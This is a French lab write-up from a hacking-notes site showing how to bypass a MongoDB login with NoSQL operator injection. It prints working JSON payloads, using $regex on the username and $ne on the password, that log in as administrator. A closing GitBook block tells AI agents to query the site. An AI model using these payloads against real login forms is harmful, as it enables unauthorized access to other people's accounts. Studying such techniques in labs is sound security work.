> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/nosql-injection/authentication-bypass-via-nosql-operator-injection.md).

# Contournement de l’authentification via l’injection dans les contrôleurs NoSQL

### Exploiter l'injection d'opérateurs NoSQL pour contourner l'authentification

**Contexte du laboratoire**

La fonctionnalité de connexion de ce laboratoire est basée sur une base de données **MongoDB (NoSQL)**. / Il est vulnérable aux \*\* injections NoSQL via les opérateurs MongoDB\*\*.

\*\* Objectif :\*\*/ Se connecter à l'application en tant que **utilisateur `administrateur`** sans connaître son mot de passe.

Des identifiants valides sont fournis pour un utilisateur standard :

* **wiener : peter**

<figure><img src="/files/bb43fad13fa630ff09caa5d26e7d29d72338138d" alt=""><figcaption></figcaption></figure>

**Comportement du formulaire de connexion**

Un panneau de connexion est présent. / La requête envoyée au serveur via **POST** est au format JSON :

```json
{
    "username":"wiener",
    "password":"peter"
}
```

**Tentative d'injection avec `$ne` opérateur**

Une première idée est de forcer l'administrateur à s'authentifier en indiquant que son mot de passe est différent de x

```json
{
  "username": "administrator",
  "password": { "$ne": "x" }
}
```

Cette tentative **ne fonctionne pas** dans ce cas particulier.

<figure><img src="/files/eb3b04848f05c26719c37745d61798fb42a5f836" alt=""><figcaption></figcaption></figure>

**Contournement avec l'opérateur `$regex`**

L'injection est possible en utilisant l' **`$regex`** opérateur, ce qui permet de faire correspondre des motifs sur les champs.

**Exemple fonctionnel avec l'utilisateur wiener**

```json
{
  "username": {
    "$regex": "wie.*"
  },
  "password":  "peter"
}
```

Cette requête correspond à tout utilisateur dont le nom commence par `wie`.

**Accès en tant qu'administrateur sans mot de passe**

Sans connaître le mot de passe de l'administrateur, la combinaison suivante peut être utilisée :

```json
{
  "username": {
    "$regex": "^a"
  },
  "password": {
    "$ne": "x"
  }
}
```

\*\* Interprétation logique :\*\*

> « Donnez-moi un utilisateur dont le nom commence par **un**/ et dont le mot de passe **n n'est pas égal à x** »

**Résultat**

Le serveur accepte la requête et répond avec un **302 Found**, indiquant une authentification réussie.

Un nouveau cookie de session est renvoyé :

`Set-Cookie: session=1jnvdOe3aaWIAyrj3WzRRJA1X40Ma1QU`

<figure><img src="/files/e832cf6ea253f07699d267214ce95a8e82a83904" alt=""><figcaption></figcaption></figure>

L'accès à l'application s'effectue désormais en tant qu'administrateur\*\*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/nosql-injection/authentication-bypass-via-nosql-operator-injection.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
